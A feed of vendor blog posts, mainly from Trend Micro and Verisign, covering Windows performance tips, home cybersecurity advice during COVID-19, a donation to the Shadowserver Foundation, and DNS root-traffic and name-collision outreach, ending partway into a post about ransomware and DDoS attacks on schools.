How to Speed Up a Slow PC Running Windows OS

Working with a slow PC is always annoying and frustrating. Enduring sudden frozen windows and stuttered animations can make you want to throw the machine out the window.

Take a deep breath, and consider these 8 tips on how to fix a slow PC running Windows.

 

 

Why is my Windows Running Slow?

First, here is a general analysis on why your Windows PC is running slow:

	Your computer is running out of memory (RAM) Your PC mode settings There are too many startup items and background programs Useless features or animation Insufficient disk space Too cluttered registry Malware and Virus Infection Unneeded third-party software

1. Restart your Computer

Many users are accustomed to keeping their computers running for several weeks. Their PC is either running or sleeping with the processes saved all the time. This means the running programs are occupying and filling up their RAM continuously, which can lead to the PC running extremely slowly. In addition, the computer might suffer from some bugs, which trigger programs to eat up much more RAM than they should. To avoid these troubles, restart your PC by clicking on the Windows button, selecting the ‘Power’ button, and choosing the ‘Restart’ button at least once a week.

A small hint: make sure you have saved your ongoing work before you shut down your computer.

2. Adjust setting modes

This is a very simple but often overlooked way to boost your PC’s performance. However, it sacrifices a bit of standby time. When you are not worrying about the state of charge and just pursuing maximum efficiency, you can consider opening Advanced System Setting in Windows for this trick.

Enter “Control Panel” in the Cortana search box in the taskbar. In the pop-up window, click “System,” and then click “Advanced system settings” in the left window, as shown below:

Click “Settings” in the performance bar, as shown in the following figure:

In the pop-up window, you can see that there are four setting modes, set “Adjust for best performance,” and then click OK, as shown in the following figure:

3. Disable Startup Programs

Startup items are programs that the system will run in the foreground or background once your computer is ON. When you download and install software, the “start-up” is usually a default choice. Therefore, if the software is not commonly used and you do not need to use it every time you start your PC, you can remove the check because it can slow down system speed. If you forgot to remove the check when installing the application, you can also make changes using the Task Manager.

To check and manage your startup programs, open the Task Manager (Ctrl + Alt + Del), then switch to the ‘Startup’ tab. You’ll also see the “Startup impact” of each startup program — either Low, Medium, or High. If you see “Not measured,” that’s because it was recently added and Windows hasn’t had a chance to observe the program’s behavior yet.

To prevent a program from launching on startup just right-click and choose “Disable.”

If you are not sure whether you can safely disable some programs, you can search the program online and learn about its function. If you are a little worried, you can download a PC cleaner app, which can automatically identify and classify these items and help you delete the unnecessary ones in batches. Remember to choose those apps without pop-up advertisements and hidden fees.

In addition, you can see the first tab named “Processes” in the picture above. Too many programs running simultaneously can slow down the system speed as well. Some programs may continue running in the background even after you have closed them. Under the “Processes” tab, you can select them and click ‘End task’ at the bottom right. However, be careful about this action because you might close some important processes needed to run Windows.

4. Turn off windows tips and tricks

When searching ways to speed up your PC online, your PC will ask you to disable the “Visual Effects” feature as they use up your PC’s performance. However, this operation needs you to balance the operating speed and the appearance of your PC, and even adjust those settings many times to achieve satisfying visual effects. Instead, here is an item that you can change without a hitch.

When you use a windows PC, Windows will always pay attention to what you are doing and provide tips on what you may want to do with your computer. You may find these tips unhelpful and even feel offended by its constant virtual viewing over your shoulders.

If you want to speed up your PC, you can ask Windows to stop giving you advice. To do this, click the START button, select the Settings icon, and then go to Systems > Notification & actions. Scroll down to the notifications section and uncheck the box labeled “Get tips, tricks, and suggestions as you use Windows.”

5. Run Disk Cleanup

Do not let that “Disk space is almost full” message pop up and stop your work. Too many junk files, useless big files and duplicate files usually cause insufficient disk space. To save gigabytes of disk space for things you really need, you should clean them regularly to free up space.

Here are steps on how to use the built-in Windows utility to run disk cleanup:

Press “WINDOWS + R” and enter the cleanmgr command with parameters:

cleanmgr /sageset

In the Disk Cleanup Settings window, you can find items you can clean.

Note that this operation is only the setting operation of the checked item. It has not been actually cleaned. After clicking OK, you need to press “WINDOWS + R” and enter “cleanmgr /sagerun:99”, and then it can execute specific cleanup operations.

You can also turn ON the storage sense function to remove unnecessary files automatically.

Enter Settings > System > Storage, and then turn ON the Storage sense function to allow Windows to clean up temporary files automatically. It can be set to run automatically every day, every fortnight, every month, or every two months.

Definitely, some cleanup apps can help you do the work more quickly and accurately. Besides useless files, they can even retrieve and delete similar photos. You can evaluate and download them according to your own needs.

6. Clean out your Registry

Registry is an important database, which is used to store the setting information of system and application program running in Windows. As early as Windows 3.0 introduced OLE technology, the registry has appeared. Windows NT was the first operating system to make extensive use of the registry at the system level. However, since the beginning of the Microsoft Windows 95 operating system, the registry has been a critical database that will continue to play a role in the subsequent operating systems.

The command to open the registry is:

Regedit or regedit.exe, regedt32 or regedt32.exe

Under normal circumstances, you can click the operation in the START menu (WINDOWS + R), and then enter regedit or regedit.exe and click OK to open the registry editor of Windows operating system.

The registry is a very messy thing. For example, when a program is uninstalled, the program’s settings are not always cleared in the registry. So over time, it will be filled with various outdated settings. This may lead to poor performance of your PC system.

A word of caution: Editing the registry manually is risky. A mistake can lead to system-level interruptions. Therefore, to clean the registry, it is recommended that a professional registry cleaner is used.

7. Malware and Virus Infection

As we all know, malware and viruses will infect the computer and make it run more sluggishly. There are a large number of antivirus apps in the marketplace. Trend Micro offers several options to consider.

8. Disable third-party services  

If you installed a lot of software on your PC, the system may become chaotic and some unexpected problems might occur. For example, several security applications are running at the same time can create conflicts that make the system misbehave. You can disable all third-party software services and only keep the system itself. The system status will also be called “Clean Boot.”

Here is how to perform a clean boot of Windows:

Press “WINDOWS + R” and type “msconfig”, then click OK. Open System Configuration, go to the Services tab and put a tick in the “Hide all Microsoft services” box at the bottom left before choosing the items and hitting Disable all.

We hope the listed solutions can help you boost your PC performance conveniently. Manually checking what is wrong with your Windows can be time-consuming and painstaking. When those irritating system messages pop up and interfere with your work, it is time to turn to a trusted all-in-one system care utility like Cleaner One. By employing this productive worker, you can retrieve and delete unnecessary items, have less clutter, make your computer more efficient, and optimize your Windows OS with just a few clicks. Why not give it a go?

The post How to Speed Up a Slow PC Running Windows OS appeared first on .

Securing the Connected World with Support for The Shadowserver Foundation

If the first few months of 2020 have taught us anything, it’s the importance of collaboration and partnership to tackle a common enemy. This is true of efforts to fight the current pandemic, and it’s also true of the fight against cybercrime. That’s why Trend Micro has, over the years, struck partnerships with various organizations that share a common goal of securing our connected world.

So when we heard that one of these partners, the non-profit Shadowserver Foundation, was in urgent need of financial help, we didn’t hesitate to step in. Our new $600,000 commitment over three years will help to support the vital work it does collecting and sharing global threat data for the next three years.

What is Shadowserver?

Founded in 2004, The Shadowserver Foundation is now one of the world’s leading resources for reporting vulnerabilities, threats and malicious activity. Their work has helped to pioneer a more collaborative approach among the international cybersecurity community, from vendors and academia to governments and law enforcement.

Today, its volunteers, 16 full-time staff and global infrastructure of sinkholes, honeypots and honeyclients help run 45 scans across 4 billion IPv4 addresses every single day. It also performs daily sandbox scans on 713,000 unique malware samples, to add to the 12 Petabytes of malware and threat intelligence already stored on its servers. Thousands of network owners, including 109 CSIRTS in 138 countries worldwide, rely on the resulting daily reports — which are available free of charge to help make the digital world a safer place.

A Global Effort

Trend Micro is a long-time partner of The Shadowserver Foundation. We automatically share new malware samples via its malware exchange program, with the end goal of improving protection for both Trend Micro customers and Shadowserver subscribers around the world. Not only that, but we regularly collaborate on global law enforcement-led investigations. Our vision and mission statements of working towards a more secure, connected world couldn’t be more closely aligned.

As COVID-19 has brutally illustrated, protecting one’s own backyard is not enough to tackle a global challenge. Instead, we need to reach out and build alliances to take on the threats and those behind them, wherever they are. These are even more pronounced at a time when remote working has dramatically expanded the corporate attack surface, and offered new opportunities for the black hats to prosper by taking advantage of distracted employees and stretched security teams.

The money Trend Micro has donated over the next three years will help the Shadowserver Foundation migrate to the new data center it urgently needs and support operational costs that combined will exceed $2 million in 2020. We wish the team well with their plans for this year.

It’s no exaggeration to say that our shared digital world is a safer place today because of their efforts, and we hope to continue to collaborate long into the future

The post Securing the Connected World with Support for The Shadowserver Foundation appeared first on .

Top Tips For Home Cybersecurity And Privacy In A Coronavirus-Impacted World (Part 2)

The past few months have seen radical changes to our work and home life under the Coronavirus threat, upending norms and confining millions of American families within just four walls. In this context, it’s not surprising that more of us are spending an increasing portion of our lives online. But this brings with it some familiar cyber-risks. In Part 1 of this mini-series, we explained how cyber-criminals are looking to capitalize on these sweeping changes to society to further their own ends.

Now let’s take a look at what you can do to protect your family, your data, and access to your corporate accounts.

How you can stay safe online

The bad guys are laser-focused on stealing your personal data and log-ins and increasingly see the remote worker as an easy target for leapfrogging into corporate networks. That’s not to mention the potential internet safety risks inherent in bored kids spending more time in front of their screens. To respond, you’ll need to create an equally focused “home security plan” governed by sensible policies and best practices. Here are some of the key areas to consider.

Protect your smart home and router

Increasingly, unprotected smart home devices are being targeted by cyber-criminals to turn into botnets to attack others. They might also provide sophisticated attackers with a stepping-stone into your corporate systems, via the home network. The home router, with its known flaws, is (after the modem) the digital front door to the smart home and the basis for your networking, so it should be first in any security strategy. Consider the following when tackling home network security:

Regularly check for router firmware updates and apply as soon as they’re available. (If you’re using a home gateway (modem + router) firmware updates are done by your ISP, so you won’t have the option to do this.) Change factory default admin passwords and switch on two-factor authentication if available. Disable UPnP and any remote management features. Use WPA2 on your router for encrypted Wi-Fi. Pick passwords for access that aren’t easily guessed. Put the router in middle of house if possible, so the signal is not overly exposed to strangers outside. Likewise for extenders. Invest in security for the entire home network from a reputable provider like Trend Micro.

Secure your home office

Cyber-criminals are primed to take advantage of distracted home workers and potentially less secure PCs/devices. Secure this environment by doing the following:

Again, apply a home network security solution. This protects your work devices, while also protecting the devices you use for recreation. Apply any security updates to OS/software. Install/maintain endpoint security software on all machines/devices. Never use work laptops for personal use. Switch on 2FA for any work accounts. Use a VPN if applicable whenever connecting to the office. Stay alert to phishing/BEC attempts. Take advantage of any training courses to stay up-to-speed on the latest scams. Disable macros in Office files – these are often used by hackers to run malware.

Stay safe from phishing

Phishing is the number one tactic used by attackers to trick you into installing malware or handing over your log-ins. Emails, text messages, social media messages and more are spoofed to appear as if sent by a legitimate company or contact. In response:

Be cautious of any unsolicited emails/texts/messages even if they appear legitimate. Don’t click on any links/buttons in unsolicited messages, or download attachments. Check directly with the sender rather than clicking through links or buttons provided or entering any confidential details. Invest in cybersecurity tools from a trusted vendor like Trend Micro, to spot and block scam emails and malicious downloads/websites.

Use video conferencing safely

New videoconferencing platforms can introduce risk, especially if you’re not familiar with the default settings. Here’s how to stay safe when video conferencing:

Check first for end-to-end encryption. Only download videoconferencing apps from official iOS/Android stores and manufacturer websites. Get familiar with privacy settings. Switch off camera access if you don’t want to appear on-screen. Ensure you’re always on the latest software version. Never click on links/open attachments in messages from unknown contacts. Use a password manager to store long and strong log-ins, and switch on two-factor authentication (2FA) if available.

Stay safe shopping and banking

Next, protect your financial information and stay safe from e-commerce fraud by doing the following:

Install AV on all PCs and devices. Always use the latest browser versions and HTTPS sites. Never click through on sensational promos or ads on social media/in emails. Always visit the site directly. Always be cautious: if special offers seem too good to be true, they usually are. Use a secure browser, password manager, and 2FA in your online accounts. Use a VPN app on any device you use to shop or bank.

Think about online safety for kids

They may be under your roof for more hours of the day than usual, but your children are also likely to be spending more time online. That means you need to have a measured conversation with them about internet safety, backed up with parental controls. Consider the following:

Urge your kids to think before clicking, and before sharing on social media. Make sure you have installed anti-malware from a reputable vendor on all their devices. Look for security products that check/update their social media privacy settings. Discourage or block downloads from P2P sites. Set up parental controls to block inappropriate content and/or to regulate screen time and time on certain sites or with certain apps. Then set up admin protections, so they can’t change the settings. Share your concerns around sexting.

Mobile security best practices
Finally, sheltering at home has limits, particularly for restless kids. When they go to the store or out to the park, facemasks notwithstanding, they’re likely going to use their mobile devices, just as they’ll continue to do at home. Of course, you’re not exempt either from mobile threats. Ensure mobile security by

Sticking to the official Google Play and App Store marketplaces. Enforce this through smart settings on your children’s phones. Running anti-malware on your mobile device, from a reputable company like Trend Micro. Ensuring your family’s devices are using the latest OS version. Ensuring your family devices have remote lock and wipe feature switched on, in case they’re lost or stolen. Never brick or jailbreak the device, as this can expose it to security risks.

How Trend Micro can help

When it comes to protecting the home from security and privacy threats during lockdown, leave no stone unturned. Cyber-criminals will always look for the weak link in the chain and focus their efforts there. Network security is important, but it doesn’t replace the need for protection on each individual device. You’ll need to cover your router, network, smart devices, and all endpoints (PCs, laptops, mobiles and other devices). Here’s how Trend Micro can help:

Trend Micro Home Network Security

Trend Micro Home Network Security provides industry-leading protection against any threats to internet-connected devices in the home. The solution

Blocks dangerous file downloads during web browsing to stop ransomware, data theft, phishing, and other malware. Blocks remote access applications. Protects all smart devices, such as smart TVs, thermostats, security cameras, etc., that don’t have their own security solutions. Parental Controls and Guardian allow parents to track and restrict their children’s internet usage at home and on-the-go, which could free-up bandwidth for important conference calls.

Trend Micro Security (PC and Mac)

Trend Micro Security, available in various editions (led by Trend Micro Maximum Security), is Trend’s flagship endpoint security product for consumers. Available for both PCs and Macs, it features AI learning to stop advanced threats. Among a wide range of protections, it includes:

Web Threat Protection when browsing the internet, defending you against bad websites that can steal your data or download malicious files. Machine Learning, to protect you from new and unknown threats. Ransomware protection via Folder Shield, to stop unauthorized changes and back-up files encrypted by suspicious programs. Anti-phishing and anti-spam protection for Outlook clients, as well as Gmail and Outlook webmail on the PC, and Gmail webmail on the Mac. Privacy Scanner (for Facebook and Twitter), Social Networking Protection for protection against malicious links in social networks, Pay Guard for protecting your online banking and buying. Parental Controls to limit which software and websites you kids may use.

Trend Micro Mobile Security:

Trend Micro Mobile Security provides endpoint security for all your mobile devices, whether Android or iOS-based.

	Blocks dangerous websites and app downloads. Helps protects your privacy on Twitter and Facebook. Protects your kids’ devices. Guards against identity theft. Optimizes your device’s performance.

Additional Trend Micro Tools:

Network and endpoint security should be supplemented with tools that accomplish specific tasks, such as protecting your internet connections, your passwords, and your identity data. Trend Micro provides

Wi-Fi Protection/VPN Proxy One Mac | iOS. VPNs with an emphasis on web threat protection or privacy, respectively. The first is available on all four platforms; the second is targeted for Apple devices. Password Manager. Manages and encrypts your passwords, and automates your logins, while ensuring you use unique, strong passwords across all of your online accounts. ID Security. Tracks your credentials, particularly the ones you use for buying and banking, to see if breaches of any of your identity data have led to their sale on the Dark Web. Notifies you when it has, so you can take steps to protect it. Premium Services. Parents working from home are not expected to be IT or Security experts, so now’s the time to ensure professional help is around when you need it by signing up for one of Trend Micro’s premium service packages for help configuring, troubleshooting, optimizing, and disinfecting your devices if they get infected.

Maintaining your family’s security and privacy on all their devices during the coronavirus lockdown above all means changing your mindset, to take into account the mix of work and play in the household during the “new normal.” Use these tips and tools during lockdown and you’ll be well on your way to ensuring you and your family’s safety from malicious viruses—both digital and natural.

The post Top Tips For Home Cybersecurity And Privacy In A Coronavirus-Impacted World (Part 2) appeared first on .

Top Tips For Home Cybersecurity And Privacy In A Coronavirus-Impacted World (Part 1)

Welcome to the new normal. We’re all now living in a post-COVID-19 world characterized by uncertainty, mass home working and remote learning. The lines demarcating normal life have shifted abruptly – perhaps never to return. That’s not the worst that can happen, as we all know, but it does mean we all need to get used to new ways of living, working and studying from home. This has major implications for the online safety, security and privacy of our families.

To help you adapt to these new conditions while protecting what matters most, Trend Micro has developed a two-part blog series on “The New Normal.” Part 1 identifies the scope and specific cyber-threats of the new normal. Part 2 provides security tips and products to help address those threats.

What’s going on?

In April, nearly 300 million Americans were estimated to be in government-mandated lockdown. Even as some businesses, municipalities and states begin to relax these rules, experts have warned of subsequent waves of the virus, which could result in new localized lockdowns. In short, a lot of people will continue to work from home, while their children, also at home, attempt to study remotely from their mobile devices.

This has considerable implications for how we spend our time. Without that morning commute to work or school, more of it than ever will involve sitting in front of a desktop, laptop, tablet or smartphone screen. Even the smart TV is enlisted. Dangers include

Use of potentially insecure video conferencing applications. The number of daily meeting participants on Zoom surged from 10 million in December 2019 to roughly 200 million in March. Visits to P2P/torrent sites or platforms for adult content. In search of entertainment, bored kids or teens in your household may have more time and inclination to do this. Downloads of potentially malicious applications disguised as legitimate entertainment or gaming content. More online shopping and banking. June alone generated $73.2 billion in online spend, up 76.2% year-on-year. Whenever you shop or bank online, financial data is potentially exposed. Use of potentially insecure remote learning platforms. Educational mobile app downloads increased by a massive 1087% between March 2 and 16. The trend continues. Logging on to corporate cloud-based services. This includes Office 365, to do your job remotely, or using a VPN to connect directly into the office. For recreation, streaming and browsing on your smart TV. But even your smart TV is vulnerable to threats, as the FBI has warned.

Risky behavior

Unfortunately, the increase in working from home (WFH), especially for those not used to it, may lead to an increase in risky behavior, such as: using non-approved apps for work; visiting non work-related sites on work devices; and using personal devices to access work resources. Recent global Trend Micro research found that:

	80% have used their work laptop for personal browsing, with only 36% fully restricting the sites they visit. 56% of employees have used a non-work app on a corporate device, and 66% have uploaded corporate data to it. 39% often or always access corporate data from a personal device. 8% admit to watching adult content on their work laptop, and 7% access the dark web.

This is not about restricting your freedom to visit the sites you want to visit while at home. It’s about reducing the risk of exposing corporate data and systems to possible malware.

What are the bad guys doing?

Unsurprisingly, there has also been a major uptick in the volume of cyber-threats targeting home users. With a captive audience to aim at, it’s a huge opportunity for cyber-criminals to steal your log-ins and personal data to sell to fraudsters, or even to steal corporate passwords and information for a potentially bigger pay-off. They are helped by the fact that many home workers may be more distracted than they usually would be at the office, especially if they have young children. Your kids may even share the same laptops or PCs as you, potentially visiting risky sites and/or downloading unapproved apps.

There’s also a chance that, unless you have a corporate machine at home, your personal computing equipment is less secure than the kit you had in the office. Add to that the fact that support from the IT department may be less forthcoming than usual, given that stretched teams are overwhelmed with requests, while themselves struggling to WFH. One recent report claimed that nearly half (47%) of IT security pros have been taken off some or all of their typical security tasks to support other IT-related jobs. In another, only 59% of respondents said they believe their cybersecurity team has the right tools and resources at home to perform their job effectively.

It’s time to step up and take security into your own hands. Stay on the lookout for the following threats.

Unsecured home routers and smart devices might be hijacked in more sophisticated attacks designed to steal data from corporate networks via the home worker. Phishing attacks spoofing well-known brands or using COVID-19 information/news as a lure. Google is blocking 18 million malicious pandemic-themed emails every day. The end goal may be to hijack your online consumer accounts (Netflix, banking, email, online shopping) or work accounts. Other phishing emails are designed to install data-stealing malware, ransomware and other threats. Attackers may target vulnerabilities in your home PCs and the apps you’re using (video conferencing etc) to gain remote access. Business Email Compromise (BEC) attackers may try to leverage the lack of internal communications between remote workers to impersonate senior execs via email, and trick finance team members into wiring corporate funds abroad. Kids exposing home networks and devices to malware on torrent sites, in mobile apps, on social media, and via phishing attacks potentially imitating remote learning/video conferencing platforms. Kids searching for adult/inappropriate content, and/or those that are bored and over-share on social media. Unicef has warned that millions of children are at increased of online harm as lockdown means they spend more of their days online. Mobile apps represent a potential source of malware, especially those found on unofficial app stores. There has also been a reported 51% rise in stalkerware – covert surveillance apps used by domestic abusers and stalkers to target victims. The pandemic has led to a surge in e-commerce fraud where consumers are tricked into buying non-existent products or counterfeit goods including medical items.

So what’s a remote worker/concerned parent to do to protect themselves and the family in the midst of the “new normal?”

Read Part 2 in this mini-series, which we’re publishing simultaneously with Part 1, where we share some best practice advice on how to keep your digital lives and work systems safe from online threats during lockdown—and where we provide tools to help you do just that.

The post Top Tips For Home Cybersecurity And Privacy In A Coronavirus-Impacted World (Part 1) appeared first on .

Meeting the Evolving Challenges of COVID-19

The COVID-19 pandemic, when it struck earlier this year, ushered in an immediate period of adjustment for all of us. And just as the challenges posed by COVID-19 in 2020 have been truly unprecedented, Verisign’s mission – enabling the world to connect online with reliability and confidence, anytime, anywhere – has never been more relevant. We are grateful for the continued dedication of our workforce, which enables us to provide the building blocks people need for remote working and learning, and simply for keeping in contact with each other.

At Verisign we took early action to adopt a COVID-19 work posture to protect our people, their families, and our operations. This involved the majority of our employees working from home, and implementing new cleaning and health safety protocols to protect those employees and contractors for whom on-site presence was essential to maintain key functions.

Our steps to address the pandemic did not stop there. On March 25 we announced a series of measures to help the communities where we live and work, and the broader DNS community in which we operate. This included, under our Verisign Cares program, making contributions to organizations supporting key workers, first responders and medical personnel, and doubling the company’s matching program for employee giving so that employee donations to support the COVID-19 response could have a greater impact.

Today, while vaccines may offer signs of long term hope, the pandemic has plunged many families into economic hardship and has had a dramatic effect on food insecurity in the U.S., with an estimated 50 million people affected. With this hardship in mind, we have this week made contributions totaling $275,000 to food banks in the areas where we have our most substantial footprint: the Washington DC-Maryland-Virginia region; Delaware; and the canton of Fribourg, in Switzerland. This will help local families put food on their tables during what will be a difficult winter for many.

The pandemic has also had a disproportionate, and potentially permanent, impact on certain sectors of the economy. So today Verisign is embarking on a partnership with Virginia Ready, which helps people affected by COVID-19 access training and certification for in-demand jobs in sectors such as technology. We are making an initial contribution of $250,000 to Virginia Ready, and will look to establish further partnerships of this kind across the country in 2021.

As people around the world gather online to address the global challenges posed by COVID-19, we want to share some of the steps we have taken so far to support the communities we serve, while keeping our critical internet infrastructure running smoothly.

The post Meeting the Evolving Challenges of COVID-19 appeared first on Verisign Blog.

Chromium’s Reduction of Root DNS Traffic

As we begin a new year, it is important to look back and reflect on our accomplishments and how we can continue to improve. A significant positive the DNS community could appreciate from 2020 is the receptiveness and responsiveness of the Chromium team to address the large amount of DNS queries being sent to the root server system.

In a previous blog post, we quantified that upwards of 45.80% of total DNS traffic to the root servers was, at the time, the result of Chromium intranet redirection detection tests. Since then, the Chromium team has redesigned its code to disable the redirection test on Android systems and introduced a multi-state DNS interception policy that supports disabling the redirection test for desktop browsers. This functionality was released mid-November of 2020 for Android systems in Chromium 87 and, quickly thereafter, the root servers experienced a rapid decline of DNS queries.

The figure below highlights the significant decline of query volume to the root server system immediately after the Chromium 87 release. Prior to the software release, the root server system saw peaks of ~143 billion queries per day. Traffic volumes have since decreased to ~84 billion queries a day. This represents more than a 41% reduction of total query volume.

This type of broad root system measurement is facilitated by ICANN’s Root Server System Advisory Committee standards document RSSAC002, which establishes a set of baseline metrics for the root server system. These root server metrics are readily available to the public for analysis, monitoring, and research. These metrics represent another milestone the DNS community could appreciate and continue to support and refine going forward.

Rightly noted in ICANN’s Root Name Service Strategy and Implementation publication, the root server system currently “faces growing volumes of traffic” from legitimate users but also from misconfigurations, misuse, and malicious actors and that “the costs incurred by the operators of the root server system continue to climb to mitigate these attacks using the traditional approach”.

As we reflect on how Chromium’s large impact to root server traffic was identified and then resolved, we as a DNS community could consider how outreach and engagement should be incorporated into a traditional approach of addressing DNS security, stability, and resiliency. All too often, technologists solve problems by introducing additional layers of technology abstractions and disregarding simpler solutions, such as outreach and engagement.

We believe our efforts show how such outreach and community engagement can have significant impact both to the parties directly involved, and to the broader community. Chromium’s actions will directly aide and ease the operational costs to mitigate attacks at the root. Reducing the root server system load by 41%, with potential further reduction depending on future Chromium deployment decisions, will lighten operational costs incurred to mitigate attacks by relinquishing their computing and network resources.

In pursuit of maintaining a responsible and common-sense root hygiene regimen, Verisign will continue to analyze root telemetry data and engage with entities such as Chromium to highlight operational concerns, just as Verisign has done in the past to address name collisions problems. We’ll be sharing more information on this shortly.

This piece was co-authored by Matt Thomas and Duane Wessels, Distinguished Engineers at Verisign.

The post Chromium’s Reduction of Root DNS Traffic appeared first on Verisign Blog.

Verisign Outreach Program Remediates Billions of Name Collision Queries

A name collision occurs when a user attempts to resolve a domain in one namespace, but it unexpectedly resolves in a different namespace. Name collision issues in the public global Domain Name System (DNS) cause billions of unnecessary and potentially unsafe DNS queries every day. A targeted outreach program that Verisign started in March 2020 has remediated one billion queries per day to the A and J root name servers, via 46 collision strings. After contacting several national internet service providers (ISPs), the outreach effort grew to include large search engines, social media companies, networking equipment manufacturers, national CERTs, security trust groups, commercial DNS providers, and financial institutions.

While this unilateral outreach effort resulted in significant and successful name collision remediation, it is broader DNS community engagement, education, and participation that offers the potential to address many of the remaining name collision problems. Verisign hopes its successes will encourage participation by other organizations in similar positions in the DNS community.

Verisign is proud to be the operator for two of the world’s 13 authoritative root servers. Being a root server operator carries with it many operational responsibilities. Ensuring the security, stability and resiliency of the DNS requires proactive efforts so that attacks against the root name servers do not disrupt DNS resolution, as well as the monitoring of DNS resolution patterns for misconfigurations, signaling telemetry, and unexpected or unintended uses that, without closer collaboration, could have unforeseen consequences (e.g. Chromium’s impact on root DNS traffic).

Monitoring may require various forms of responsible disclosure or notification to the underlying parties. Further, monitoring the root server system poses logistical challenges because any outreach and remediation programs must work at internet scale, and because root operators have no direct relationship with many of the involved entities.

Despite these challenges, Verisign has conducted several successful internet-scale outreach efforts to address various issues we have observed in the DNS.

In response to the Internet Corporation for Assigned Names and Number (ICANN) proposal to mitigate name collision risks in 2013, Verisign conducted a focused study on the collision string .CBA. Our measurement study revealed evidence of a substantial internet-connected infrastructure in Japan that relied on the non-resolution of names that end in .CBA. Verisign informed the network operator, who subsequently reconfigured some of its internal systems, resulting in an immediate decline of queries for .CBA observed at A and J root servers.

Prior to the 2018 KSK rollover, several operators of DNSSEC-validating name servers appeared to be sending out-of-date RFC 8145 signals to root name servers. To ensure the KSK rollover did not disrupt internet name resolution functions for billions of end users, Verisign augmented ICANN’s outreach effort and conducted a multi-faceted technical outreach program by contacting and working with The United States Computer Emergency Readiness Team (US-CERT) and other national CERTs, industry partners, various DNS operator groups and performing direct outreach to out-of-date signalers. The ultimate success of the KSK rollover was due in large part to outreach efforts by ICANN and Verisign.

In response to the ICANN Board’s request in resolutions 2017.11.02.29 – 2017.11.02.31, the ICANN Security and Stability Advisory Committee (SSAC) was asked to conduct studies, and to present data and points of view on collision strings, including specific advice on three higher risk strings: .CORP, .HOME and .MAIL. While Verisign is actively engaged in this Name Collision Analysis Project (NCAP) developed by SSAC, we are also reviving and expanding our 2012 name collision outreach efforts.

Verisign’s name collision outreach program is based on the guidance we provided in several recent peer-reviewed name collision publications, which highlighted various name collision vulnerabilities and examined the root causes of leaked queries and made remediation recommendations. Verisign’s program uses A and J root name server traffic data to identify high-affinity strings related to particular networks, as well as high query volume strings that are contextually associated with device manufacturers, software, or platforms. We then attempt to contact the underlying parties and assist with remediation as appropriate.

While we partially rely on direct communication channel contact information, the key enabler of our outreach efforts has been Verisign’s relationships with the broader collective DNS community. Verisign’s active participation in various industry organizations within the ICANN and DNS communities, such as M3AAWG, FIRST, DNS-OARC, APWG, NANOG, RIPE NCC, APNIC, and IETF¹, enables us to identify and communicate with a broad and diverse set of constituents. In many cases, participants operate infrastructure involved in name collisions. In others, they are able to put us in direct contact with the appropriate parties.

Through a combination of DNS traffic analysis and publicly accessible data, as well as the rolodexes of various industry partnerships, across 2020 we were able to achieve effective outreach to the anonymized entities listed in Table 1.

Organization	Queries per Day to A & J	Status	Number of Collision Strings (TLDs)	Notes / Root Cause Analysis
Search Engine	650M	Fixed	1 string	Application not using FQDNs
Telecommunications Provider	250M	Fixed	N/A	Prefetching bug
eCommerce Provider	150M	Fixed	25 strings	Application not using FQDNs
Networking Manufacturer	70M	Pending	3 strings	Suffix search list
Cloud Provider	64M	Fixed	15 strings	Suffix search list
Telecommunications Provider	60M	Fixed	2 strings	Remediated through device vendor
Networking Manufacturer	45M	Pending	2 strings	Suffix search list problem in router/modem device
Financial Corporation	35M	Fixed	2 strings	Typo / misconfiguration
Social Media Company	30M	Pending	9 strings	Application not using FQDNs
ISP	20M	Fixed	1 string	Suffix search list problem in router/modem device
Software Provider	20M	Pending	50+ strings	Acknowledged but still investigating
ISP	5M	Pending	1 string	At time of writing, still investigating but confirmed it is a router/modem device

Many of the name collision problems encountered are the result of misconfigurations and not using fully qualified domain names. After operators deploy patches to their environments, as shown in Figure 1 below, Verisign often observes an immediate and dramatic traffic decrease at A and J root name servers. Although several networking equipment vendors and ISPs acknowledge their name collision problems, the development and deployment of firmware to a large userbase will take time.

Cumulatively, the operators who have deployed patches constitute a reduction of one billion queries per day to A and J root servers (roughly 3% of total traffic). Although root traffic is not evenly distributed among the 13 authoritative servers, we expect a similar impact at the other 11, resulting in a system-wide reduction of approximately 6.5 billion queries per day.

As the ICANN community prepares for Subsequent Procedures (the introduction of additional new TLDs) and the SSAC NCAP continues to work to answer the ICANN Board’s questions, we encourage the community to participate in our efforts to address name collisions through active outreach efforts. We believe our efforts show how outreach can have significant impact to both parties and the broader community. Verisign is committed to addressing name collision problems and will continue executing the outreach program to help minimize the attack surface exposed by name collisions and to be a responsible and hygienic root operator.

For additional information about name collisions and how to properly manage private-use TLDs, please see visit ICANN’s Name Collision Resource & Information website.

---

^{1. The Messaging, Malware and Mobile Anti-Abuse Working Group (M3AAWG), Forum of Incident Response and Security Teams (FIRST), DNS Operations, Analysis, and Research Center (DNS-OARC), Anti-Phishing Working Group (APWG), North American Network Operators’ Group (NANOG), Réseaux IP Européens Network Coordination Centre (RIPE NCC), Asia Pacific Network Information Centre (APNIC), Internet Engineering Task Force (IETF)}

Learn how Verisign’s targeted outreach identifies and remediates name collision issues within the DNS.

The post Verisign Outreach Program Remediates Billions of Name Collision Queries appeared first on Verisign Blog.

Ransomware and DDoS is on the Rise: Tips for Distance Learning in 2021

Ransomware and DDoS is on the Rise: Tips for Distance Learning in 2021

The holidays have come and gone, and students returned to the virtual classroom. But according to the FBI, cyberattacks are likely to disrupt online learning in the new year. As of December 2020, the FBI, Cybersecurity and Infrastructure Security Agency (CISA), and MS-ISAC continue to receive reports from K-12 educational institutions about the disruptions caused by cyberthreats, primarily ransomware and Distributed Denial of Service (DDoS). To protect their education and digital lives, distance learners will need to stay vigilant when it comes to ransomware and DDoS attacks. Let’s dive into the impact these threats have on the K-12 education system now that more people are plugged in as a result of distance learning.

Hackers Hold Education for Ransom

Of all the attacks plaguing K-12 schools this year, ransomware has been a particularly aggressive threat. Ransomware attacks typically block access to a computer system or files until the victim pays a certain amount of money or “ransom.” The FBI and the CISA issued a warning that showed a nearly 30% increase in ransomware attacks against schools. In August and September, 57% of ransomware incidents involved K-12 schools, compared to 28% of all reported ransomware incidents from January through July. And it’s unlikely that hackers will let up anytime soon. Baltimore County’s school system was recently shut down by a ransomware attack that hit all of its network systems and closed schools for several days for about 111,000 students. It wasn’t until last week that school officials could finally regain access to files they feared were lost forever, including student transcripts, first-quarter grades, and vital records for children in special education programs.

